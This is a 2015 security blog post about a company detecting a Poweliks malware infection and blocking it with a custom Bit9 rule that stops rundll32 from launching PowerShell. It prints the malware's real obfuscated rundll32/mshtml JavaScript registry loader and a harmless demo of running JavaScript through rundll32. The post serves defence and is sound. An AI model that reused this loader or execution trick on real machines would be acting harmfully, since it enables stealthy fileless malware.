The Lazy Genius

Security News & Brain Dumps from Xavier Ashe, a Bit9 Client Partner

Following Poweliks Strike, Custom Bit9 Rule Offers Key Insight and Blocks Infection

Posted by Xavier Ashe on January 21, 2015

This blog post I wrote for the Bit9 Blog and was published on January 21st, 2015.

ITsec

I love to hear stories about how our customers use our products. I previously wrote about a global services firm that used Bit9 to connect the dots to get to the bottom of an Internet Explorer exploit. This same company sent me the following story to show a particularly useful rule they created in Bit9:

“We wound up getting hit by a Poweliks variant pretty badly shortly after I originally emailed you, where 44 users who were in full lockdown mode had to have their computers reimaged (At that time the majority of anti-malware tools didn’t detect that malware, let alone clean it). Fortunately, we identified what was happening fairly quickly thanks to the Bit9 agent, and we were able to put a custom rule in place in Bit9 to identify users who were infected or were in the initial stage of infection. Without Bit9 installed we wouldn’t have even been able to identify who was infected, let alone prevent the payload from executing.”

Somewhere along the way, the computers that had to be reimaged acquired the following registry entry:

rundll32.exe javascript:”\..\mshtml,RunHTMLApplication “;eval(“epdvnfou/xsjuf)(=tdsjqu!mbohvbhf>ktdsjqu/fodpef?(,)ofx!BdujwfYPckfdu)(XTdsjqu/Tifmm(**/SfhSfbe)(ILDV]]tpguxbsf]]dmbttft]]dmtje]]|bc9:13c5.1:db.5cc7.c89e.b9g6:18:b9e6~]]mpdbmtfswfs43]]b(*,(=0tdsjqu?(*”.replace(/./g,function(_){return%20String.fromCharCode(_.charCodeAt()-1);})) –Embedding

Once the above code executed, it would

  1. Spawn an instance of PowerShell
  2. Spawn a dllhost (or many dllhosts)
  3. Connect to up to five different Russian IP addresses, and then it would
  4. Initiate the usual malware behavior

Pretty clever!

I wouldn’t have guessed that rundll32 would be able to execute Javascript code, but if you are curious to see for yourself, try executing the following:

rundll32.exe javascript:”\..\mshtml,RunHTMLApplication “;alert(‘RaawwwrrrrRRrrr’);

Ashe1

Fortunately, rundll32.exe doesn’t usually launch PowerShell, so we were able to quickly identify infected users by using the following Bit9 rule:

Ashe2

The rule would then block PowerShell from executing, thereby preventing the computer from becoming completely infected. We then ran a report based on files being blocked by the rule to identify the infected users.

In the end, the exercise provided the fuel that I needed to convince management to approve an installation of a Carbon Black server for even greater visibility.

 

Advertisements

Leave a Reply

Fill in your details below or click an icon to log in:

WordPress.com Logo

You are commenting using your WordPress.com account. Log Out / Change )

Twitter picture

You are commenting using your Twitter account. Log Out / Change )

Facebook photo

You are commenting using your Facebook account. Log Out / Change )

Google+ photo

You are commenting using your Google+ account. Log Out / Change )

Connecting to %s

 
%d bloggers like this: